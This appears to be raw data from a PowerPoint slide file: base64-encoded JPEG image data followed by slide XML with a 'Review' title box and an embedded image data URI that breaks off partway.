RMeE2i0ssoZbCLFBFaMpxNwvEaC/fW2Jewva9he3C/O3deos7rYctiWaPP9qKGdXJKN0Ystl5dvjSRdDSVlQ342UmI2vs9Gd1jngxETNE+RmUKz5c2vVbOARzBNO/SfgUh2G8US2ROgRFFzYLIlh2nhzq5pgoxktGn3Yyx9UdQWAsh4qLADTspUygcx5ijtoOuyK3e3agwat0CEGTK0jO7SOxA0uzknS507zTL0jY/odlYpuZiMY8ZSI/kxqwiVfaHmKRx2zo54zHNGkkZsSrqGW44Gx5isvNs2sUVPcrcZ8M8U80/SOuFTDxRiIRiJDZ2BIJztcsL6XufdGbny4jEbSxeNjjjfDSzHCl3kKusUIWzRrazKbJcdvvrRJ4syMtyuZWXMtrrcEZhfS4veq7ujuvLs5GiE4mwwDGKMwrHIHLFmvIDZr8Ne3kBW9rsWtFS9J22ppMZBhsNK8ZieIM6OVPT4g5YlJHZGHb96rnuftuTFpNMbfZzM6YU5bM0UfVMjG+uZgSNORrLd4MBiVlwsTqRjcVJPiJOYWbEN0MSBhp91GGbQ6Zq2jZWzUw8EcMfqRoqL4KLXPedSe800qSRkbbHEkYYWIBHfTRYXhOaE3HNDqD/AJ51CekbbH2bAsVlkjndkXD9FbpHlzAqoBBuunWHMac7F/uxiMW0J+3xRxyrbrRuCrjKCWKj1CCbEXtcG1hakrFj3mix7P2qsunquOKnj7u0U9qv4nB5jmU5XHBhp5082btYk9HLpJyPJv70rRqZKUUUUowUUUUAFFFFABRRRQAVH7U2l0YyrrI3AdneaXx+NESFjx4AdpqIw0JuXfV2+A7K1Ixs9wuFy6tq54njTiqN6UulEcLffHBKz/bPs75JgCAI3vzRSSSOBIF7cQ93b21HhsDAcTj0mWRzHBMQVzKSciOTc5gB1i1rHQnS5pWLEvNFf9I25rR9Li8KpyuAcXCvE5TmXFRjlIh6x9/IveA3NxUsWIw2KwyNLh5WOFxEcSljExOYqF5R3++QngCyE6VtdRux93cPhOk+zxLH0rZ3y31OthrwUXNlGgvWqeKZjhm0Re2vR9hsVivtEufVBHJGrlI5spuply6sBYC1xfKvZViZ1RRcgKNBrppwpE4ktpHbvc+qPD2jUdtXbWGwYDTyjOfVB60jfgQcvh30uXg3CySX2lm9RNPabqj3Dia5ZGtd5LDnlAUf9RuaoG1/SVIQTGFiS9gzHO593qg93W8az/a+88+IY5pWI5XJJ8uA9wqseFshP8iMTa8Xt3BRfpJ47/tS5z5AmmB392cDYSIT3Rk/01hxZjxYnxJrzoaquBfZzv8ALfiNzO/WA5uo8YiPpTrDbxYGT1Jo79zlD8bVgnRE2Gp7Bx8hSkUVza6ppfrA2PwNuflR+lfZq/Kf0fRcZuLpKSO+zr58fjSoxLD1luO1Nf4TrXzvhNsz4dvu5CttOqxAPlWgbH38xCKplUSAi9wRcfvAWPl76nLhaLQ/IUjTY5VfgQbG/eD22PA0rVb2ZvFBivVa0nZ6sg//AF8al0xZX19V9sDh+IcvEVFqjoUkyp7F2dLj9ovjcTG8cOHZocHDIpVswPXnZTzvw77ewKjN+961xM64COUxYbpEjxuJCkqpa9sOGAsCSpBJ0vpwDVoW0cO0sLpHKY2dCqyoAWQkaMt9P80I41Vt2MMuydnSDGJHEsUjFpVbpPtGqlJcp1Dk5VCnW6jhTJ+mNeEvsjBDZ8DLPi80Cv8AdNOVUxRmwWJpSRnsb2JtpYWqUmhWVQQQdAVYG4sdQQRxBrM9tY07UxuHCQs6JgXxkeFnPRq8xkKp0o4EEZSNbMLagMTVt3Uwf+mbPijxcyKc/MhY0aV7rCh7ASe7jyFY176CZatlbSJPRyeuOB9ofn86lKgMXhs2o0cag8PdUlsvH9Iuujrow+tI0UQ9ooopTQooooAK8JtXtRm2sTZQg4tx/D/f86AGTy9NJmPqLoo+v18qh9+vtf2J/sBtMCCbfpMg1YRci+g0PEXA1tU1ELAAcqo+J2zj9muzYlftuCLM3TRKFnhBN7PHwKi/hb9YcKokTbGWwPSoRGv29AYmJjGKiW6Z7ax4iHjG9r3AGo1AI1o2huAZVf8A02bDtgcVrJFIS8UT8p8OUvZh2XFuBuNB7tTYUGNddo7M6GaVWvLA4HRzXBBEiN+jlysdSBfjx1N02JsODCIywRLEHYyOqkkZiADYnkLWA0HcKdtLKFSb2Pdn4UQQRx5iVijRMzHUhFC5m79K4J6TU6R9nAt3nsXupMydIbn9GOH7RHM/sisq9IPpCOILYfDNaHhJID+l7VU/+n/N4ccjFyZk5qCtkxvl6VBHeHA2Zh1WmsCi90Q4Mf2jp2Xqg4TZM2KJldyWYm7uWZmPjxtUbBpyB8QD86s+7mMdplSwCWPVAAAAU6j3/OutQ6LBwfs/ZLJI4bd6OwzLnsABm1A7bDgL1W8TsR1ksUIBchSeqp10sTpwrSIsNQ2zS4ZXylT6oy6rbW5voTw5UinRaXCpFGO7fRgiS+bQjKGKkHlmCGzXsPeKe7P2LEl2kGZVF7k3FxxIWwJB4i40seNW3E7Jd8lnACkMCAVbMNBa2mWxPf366NMXIMNnzZGzSDIpNmCsNb8TlXQcKO7YfqUSN2TLhyQVyJI9xlC5SByW/AnT3082jsFJhZ11HBhow8D9DTXa27ilVlgGUEFirMF0Gt0B7rm1+FrVJ7vY3poyGILroRzI06x8T2VjfqGS/wAWig7Y2A0Da6ofVbt7iORpthca8Wg1Tmp4d9uY91XDfRusia2ALHTQk6Ajtt1vOq/jpVdEVYlQre7A3LX5a6+ZNVjK1k5pw6t0OoXLqJItbcVvZwRyzdvYTbx7LXu/vuy9WYllGme3WU9jjn4/PjWfYaHrfpOjuCM1jbwa3I1KbNhdWKyLYkAK4N1bLfQkaZrX79KWUUx4TaZsWFxQAzRm6HUqDpr+sn5c6Nu7Gi2hhWhcnK1mVltmR1N1YA6XB5HvFZxsbbD4STiTCx6y+yT+uv1HPiNeN/wm0BbOhup1YDmPbHf865pRaO2E1IabE3di2cJ8VicSZZ31mxM1kAQEWRVuQo0XQcbADgBUFicRPt68cQMGy8wzzOo6XEZWvaNT6q3HHu1uerVt2zsODGpGs6dIiOJVGYgEgEa2PWUg8Kg9s78ZJPsmz4PtGKXqlVGWCC2n3jaAAdgsBwuOFYs/9Gf9Fj2Dgnw+Hjhmn6Z1uquRlZlF8gIuczBLXPO1++nMpMbiRfBh2j/PpWbbF3YxOLvi58TKm0YcQUQSJbDxBHGdEQaOjoTqpAPDtJ0xjyNY1Rqdk1FKGUEcCLiu6h9iz5WMZ8V+o+vnUxU2OmFFFFYaBNVuWbPIz+4eHL/O+pjas+WI9p6o9/H4XqBU2poispfpKgmZoWKYh8GiuZfssgWVJLjJKVscyqL2HDU3I0prs7fyRUiXCq+0Io4r4iRmC4q5c8IrljlUa6Ne462hNX/PVe23uNhcU3SMhjmvfpYG6KS/eQLE95F++qprTJtPaPd2Nm4ORhj8NC0TSoVIIMakFgSxiHVvcesNDqeOtTuIkzHIPFz2L2eJpDB4aPDQLHGMscaBVF76Dv5k/M1G7c2yMHhZJn1fiB7TtoieH0BrNsLpFY9J2+GRfskBsxA6Yj9VCNIx3kanusOdZnHHXUszSOzuSzsSzE8SSbk05girshHqjzOWbnI6hhq57lYAdd/BeHffQ+A18RVZijrRt19ntHAubieta2ouSRf3W86XkeCvDDJIxwV1DhFQmyqMx0yrY3PG558PhTuOKjE5lUZBc310J04nh3A++1c1nbRC7y7QeBFyCxYkZjY2tyA7e+q/s6d5pIo2dj17hgQGBJuWDEcePw7LVokmFDAqwBU6EHUEVAJuwiYtMqt0eUve97OjAgZiNBw53NNGSoSUW3Y22ts6cIIVPSo/VzOt2Q8eswFrcbG1xaqmmeGS4ujqbd4PMEcxWs9HUHvBu9FIC5OSQ2UNrZm4KpHfoKIz8Zk+P1FH2ttJsRlLKoZbi631BtoQSeBv51FPFT9kpJ46usHO8kZJFThtsvcX0HVzEDUlWBzW7coy99dyR01ljpibtaJXG4xJIWdC3VIvYlWXXuvyPeNKW3R3qMUoie4jY2Qtybja40sbg9motxsEd30jZJI8tnIOY+0p007LX+NRSbANns1nSWynW1lsb294PupaWh05Jpo2bZ+LsQP1W1XuPNfqKY7VEGBll2g7SKGjSKVEXMsjBgI3KgeuL5Qbga68ahN39pl0yMesLa/tDgRVshm6WPiVJBBItdW7RfS4Oo91czVM7YytFA2/vzjZOjCo2Bw8pIDlOlxhQKzGRYQcyrYcQP3qlfRiJR9oOXEfZXaN4XxVulkkKkSvb2TZTz5anWpHd7cmHCv0zM8+KPrYiYlnuRY5Bfq8SOZ76seehtaRqT2ztnIIYcVN6scUgZQRwIBqslql9hzXQr7J+B/vepsoiSooopBiG29Lqq9gv56D5GonNTrbMt5G8beQqPz1RaJvYtmozUjnr3PWmHGJa7KvL1m8F4Dzt5VmPpS2z0k6QA9WMZ2/G408l/nNaKZheRjwHVv2BRc/EnyrDtoYwzzSSnjI7N7idB7hYe6rcUcnNzyqNHEKVIwR1L7t7i4jFDMq5U9pquuE9ERtrOAfCrS5Ir05uPhm80VfdTZwlnGbVUGcjtsQAPM391aLFHUI26z7NdSZI26ZlgjzA+ubvYgfso3vtU5Ng8TEpd+hKKC7ZQ+bKou1teNga55y7PB28ceqpjmOOl1So/EY89AskQBLmMJmvY52HG2vAk0v0eKUZmEGUC5sHvYam3W42qZWxvtXplZDHIBdwFToixbQk5mvwsO7xp5s/aCzBsoYZTY5ltrcjQ6g6g8DSGIxIkjhniAZmKiLNfL97YEkDj1b0htKB8JH02KMTRB0FghJDSSKo6NRpcsRqbnjWmekriIwVOY2W3WN8un4uQql7Tj6CUSrIhsc0MdmvY8CRxAtqCT2W41MYiKTaReOHKscbA5mzXZteXC3jUdtDcOeKN5C6MERnIAOYhVJsNeNhTRpbYkrekQG1NoGdgzKqtaxKgi/ZcefnUey0sr5lDLqCLj3jSrFBuHMygmRBcA8CePvq1qJGnLRUJEptKlXqT0dS20lQn8JH1qtba2DLhmAkWwOisNVPv7a1ST0LKDWyvlihzKSCOBHGrDsxLwK3NsxY9rXIJPebCpaP0YyOobpV1APA86fYHcCeJColQi99QdL8bWNY5x+wjxST0VrDzGOQHlwNXbZOM63cwv+8ND8LVGz+j+Y6mSPt4H86jN2driSJHHAEHXs4H4GkdSWCkbi8l+zUZqQR9K9z1E6BbNUhsWW0lvaBH1HyNROenOAls4PYQfjrWM1FsoooqZQp+0pLue8sfM00zUptFuv7vqaa5qsiLFs1Gekc9cyPofA/KtMIfeHGdHgJm5lH83JA/mFUz0b7sfa8Tdh92mp/KrBvvLbZ5HaIh/GpqY9DGGAwrvzZyPKq31g2Qce3Ikyy7z7zwbKwokkBtfJFEls0jW9VewW1JPDxsDnqemTHu2ZMHh1TkHeQtbvYED+GufTE5k2lh4z6keHMgHLM8rgnyjTypxujuYMZEz9Jls1rWvSRjFR7SKTnLt1iJbQ3yn2nicCj4YxdFJI75ZM6MxjyxspIBFrubHt41sMMYmgU8nQA/vCxrNNubl/YsNLielLdCvSZbWvZhpflV83N2oJsKhHC7W7he4HupZ1XxHg5X8iqbBJfC4FDxDAN/yUZT8bVcVPLlwNVndeC+Llj5QzYy3cHnuv8NL7u7U6bEY9L6RYp0HgqRL/ADBqyRsNDPdw/cYOM8UlkQ/8jOnztSXpa2jZMFDa/SYnOV5FYUJ17szofdTbdeNhtTGISckc0zKCTYdNkk0HL1qivSBiTLtaJBwgw1/35nP9Kx0yXyQl/B/wXz0f4cR4MudMzMxP7I/sKk92ttLjsHFOBpJGrMvIEqMy+dxUHvLi/sexJyDYrhii/jkAjX+JxTf0RSZMJ0PsZSPAj871Nq05FU6qJQEwnQtJAeMMskX7qMQh965T761iVymGLjisTML8LqhIv5VRd+sF0W1JOyeOOYfiX7p/5EP71aLNg8+HKDTNEVv2ZkIv8apN2kyfGqbRmG6XpExkkkf2pIWhlt1o1ZHQn1SQWIYXsDz1v3Vcd9sOHwE7EXMcZmXxiGfj3hSPeaquxPR7PGY0kyhI8oLA+tl7ByvU36Tdrrh9mTC/XmX7PGOZaTRreCZj7u+h1a6hG2n2KvgfS3PeNTgV6O6qX6ck5bgFrZOzW1af090zDhlzDyvWEwJZUHYF+lbhD/w4/wBv+mt5IpaF4puWzN4/Szi3jDLs5MrC4P2k8D+5UFumrRx9G2hy8PP8q72MP/Bw/gFJ4OYDEi3Z9SKqopXRGU22rNJwM+ZFPaAfhS+aorYst4k8Kf5qg0dCeBbNS2Fbre40zz0vg2649/yNYMWz7fRUTnNFTopZE7V0cfhHzNM81Pt4VtIP3h5N/eorNVVok9i+auZD1T4H5UlmozVphWN9jfAn/lH+Jam/QrjQcNLH+sr3t3MND538qht4482CkHMKf4Df+mqruTvScBiRJYtGerKo4le0ftDiPeOdV69oNHO59eRNmh+lnd9maHFoLhFaKWw1CFsyP4BiwP4h31Xd095cTh5oo4yn2dnHSKUBY306rcuVa5s3akOLhzwussbDWxvb9lhxU9xsajDuPhekEgTKQc1gbC/hUlNdesi8uN9u0WcekU//AMnGf7J/mWo70YYq8DJ7JUjwIFPvSVKF2Ti8xC5oiq3IGY5lsBfie4VW/RpicsxX2ox5j/vWRXwY0nU0XvYuzuixWJkPCVw4/wDjjB+KtVF9EuIMkuIlYG2IkmmBINjmkJ07dCKu29GO6DA4qXmkEzD8QjbL8bVU/RzthRDgoWFnQZeGjKUOvcdBpWLKbNdJpFow+xOjxWIl/wDVKN5RRJ/QazzZ9sTtXFvmN2xaxZctwY8OuXMGvp1kGn7Va/tOdYopJW9WNHkPgilj8BWSeiLAlx0retlZ2P7crXNbB4bMmspGnT4ZZUKOoZCLFSAR3aGvNkbDiwxJiTLm0Op+tZr6WT02JweGJIXLNO4BINuqifKSme5GCTB4xHjZxn+7cFyQVYg8D3gUKDcbsHNKVUXD0qYTTCTj9WVoW/DMtx/FGo/eq5NN0eGz2vkiL2va+VL2v7qYbwbN+1YZo+eaN1/FHIjj+W3vp1tAWwco7IJB5Rmpt4SKJVJsyub00YiRAYNm2LC4aTEZl1/ZVASPeKqWMbE4ycT42QMy/o41Fo4x2KvLlrqTbUmltjH/AMNF+BflS0hrrjBLRxy5JPA3biPEfOtsh/4cf7f9NYix1HiPnW3Q/wDDj/b/AKaTl8H4PTEdl7WRcChuCyoAVvrfgB/eo7YEt5QTxJJPneoXDH7tfAVKbAPXJ7AavVI5HK5GpbCb7pPCpLNUXskWjUdij5U9zVzPZ2rQvmpxs8/eL7/kaYZqe7IF5R3Bj8LfWsYyJ7o68qU+xUVGy1Ff3uisQf2j/EL/AEqt5qu29WFzRMR7N/epv8r1Q81VhlEp7Fs1Gakc9GenEGWMS4kU8Dr7mGv1rLWiKOynipK+RtWqYzQg8j1T79R8fnWfbz4TJPm5P8xofhaq8bObmVoa4TMrZ45Hif24naNvNSKlhtjHsLf6lirf7zX873qFgepGF6pKKZHj5JLFno2Isj55pJJn9qR2Y+ZJNTNmy2SR4zwDRuUYeDA3pnE9Oo3pKLW2IS7OmkUpJjcU6NoyPiJGVhxsVLWIqTCELZWZCBYMjFWXvDDUGklalRe1+XC/K4tcfEedYNdnkGzWljeOfaGNAZSLtiZXjIOhR47m6kXH0qTg3QkkyxYfHPHkyBxBK8YKkaPcEdJbhw0vUeGq1bl7PfOZjomUqL/rXI1HcLUksIpH5MdbN9H8UUvSSSy4hsuW+IlaRgovYAnldibXHbTt9zICb3kGpNg9rX4WNri3jepvPXJeodmdHVGd7Z3Gxcd2h2hjXT2RiZc477A6jwqAxOysWq/eY3HhWFuvPMFIPLU2Ola+z0z2gA0bqwLAqQVHE3HLvp1P7QkofTMqghEaKg4KAB7qTkap3FbrTqCQFbuVtfiBUZithzqLmI8baWY+Skmrpo5XFrwiZnphPj8SL2xuKt2DES2t2WzcKczvUbO9UpPZBzcdDTLlAA5VLbuRXP4mA917n4CoaZvjVs3VwuoPsj4n+3zoZsVbResLoKWzU3jNhXWeuY7RbNU1uxFmkJ/Cvmf7VX81XDc7DdQN2kt7h1R9aSWEPDZaaKKKgdA2x8WZD3fLn8KzDGwdHIyH9Uke7kfK1auRVD302flZZBw9Rvmp8rj3CqcbzRLkWLK9mozUhnoz1cgdzpmUjt/wGqxvBg+liOnXHwYfn9asmeo/aEdutyOjfRvpTREkrRnUbU+glrrbeByOWHA8fHtplFJXQsnFJUyaikp3HJURDNT2OWlaKRkSSPSyvTBJaWWSkoomOw9adslrQRjMpARRdRYHTsrKRJVk3S23kfomPVc9Tufs9/zt21OcbRbjlTL50lcmSm3S1yZqhR02LtJSDy0k0tISTVtGWdSy1D7a2sIYy548FHa3IU6mnrP97to558oOiDL3ZuLfQe6qwjbI8k+qshcTPck8zrTCV67lkplPJyHE11aPPS7MUwy5nvyFaLsDCZEF+J1Piaqe7ezMzA20X4n+1XuAWFSm/Dp41bsdhq9zUjnrzPUi45jBYgDiSAPE6CtN2NhBHGAOQCj3Dj53qi7p4EyTZraJw/EdF+p9wrR40sAOyo8j8L8a9OqKKKkVCo7bezhNEyngRa/Z7Le41I14RQsA8mM4iIxuyMLMpII7xSeerhvzsI/pkGqi0nevJ/dwPd4VSc9dcXas45Lq6Fs9eObi1JZ6M9MKQ20sFplPA+qf6TVSxOHMbWPCtCnQMCDwqvbU2fybhyb6HvqkWQnH0r8ctO4p6YzwlDY0JLVDnqtExHNS6zVDpPS6YmsoZTJYTV0JqjVxFdielop2LlsDeSUypG7Z1a4u2rDQm+bnw51amxFZ9unrMW9hfi2nyvVsbFVGccnVxy+OR++IppiMYFBJIAGpJOgpjiNoqoJZgAONyBVO2/vP0oKR6R8yeLWPwFEYWZPlUUSO1t8+KwjuznT3qv5+VU+Wa9cPLTSbFchqfgKukonH8uR5Op8Rbx5Cl9l7PLt3niewUns/ZzO3aeZ7KumytmiMfPvrG/SiXiH2zMGEUADhUiGpuptXWepMusC2evVNzYak6CkM9WncnYhkfpmHVU2S/N+beC/PwrG6VjRVui27sbI6CJQfW4t+M8fIWHuqbrlEsLV1XI3Z2JUFFFFYaFFFFACWIgDCxHnw14g91ZTvVsA4WS6g9CxOU+yeaH6do8DWt0y2psxJ42R1urCxHyIPIjkaeEurEnDsjFc9Gen28OwXwkmVtUN8j20Ydh7GHMVFZ661k4njDF89JyqGFjXGejPWmEPtDZWmguOzmPA/Sq9Pgyt8vvHMe7lV4JpnisAr8Rr28D50yZOUPopYltx0pVZalsXsQ8rHx0PnURNs4ryK/L4U9kml6KCauumpkY2HAg1yWfsHxosP1rxl/wBhERwjSzN1mPM9nkPrTPaO92UkRAE+0b28tKqsm152XKTceH1pqWc8wPD+9JXpbNUmSWO2m0zZnNzawsAABTCTFgc7nsFcLg2btPyp9hdiMeVviaa2J1it5I4ln7hUns7YpblYfH+1TOC2Kq62ue01LxQAUo+XjwRwGzwgFhUkulIhq9z0rHWBfPRnpDPT3ZGy5MTKI4xrxZj6qr7TH/L1mjVkebA2M2KlCi4Qau3sr+Z4D+1a3s/BLEgVRYAAAdgFNNg7DTDRBEHeSeLNzZvy5VK1yzn2Z2ccOqCiiiplAooooAKKKKACiiigBltTZSTxskihlPEfIg8iO2sm3n3TkwbZtXhJ0e3DsVxyPfwPwrZqTnw6uCGAIIsQRcEHkQeIp4TcSc+NSPn7PRnq+7z+jU6yYTxMJP8A9bH+U+fKs+njZGKupVhoVYEEHvBrrjJS0ccouOxTPRnpvno6SmEsXJpJ4ga56SjpKAEJdnKeIHlTdtjp7Ip/0lGetsWkR3+jJ2UomylHIeVPc9HSUWFITTBgUusYFcZ6OkoNwLhq9z03z0dJWG2OM9GekFJJAAJJ0AAuSewDnV53Z9G8klnxV0TiIxpI34j+oPj4UspKOxoxctEHu/u9LjHsgsgPXkI6q937Tdw+HGtb2HsCPCxhEHeSfWY+0x+nKneCwCRIERQqqLBVFgP87ac1yzm5HZDjUQoooqZUKKKKACiiigAooooAKKKKACiiigDwiovbW7MGLW00YYjgw0dfwuNfdwqVorU6MavZk23PRXNHdsMwlX2Gskg9/qt8PCqVjMLJC2WVGRvZdSp91+NfR1N8XgI5VyyIrr7LqGHkatHma2QlwJ6PnPpKOkrZNo+i3By6qrwn/wBt9P8Ape48rVW8b6GnH6LEqe6SMr/EpPyqy5Ysg+GaM/6SjpKtOI9FWOXgsT/hlt/OFpm/o52gP/LE+EsR/rpu8fsn0n9EF0lHSVOr6OtoH/yxHjLEP66dQei3HtxSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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845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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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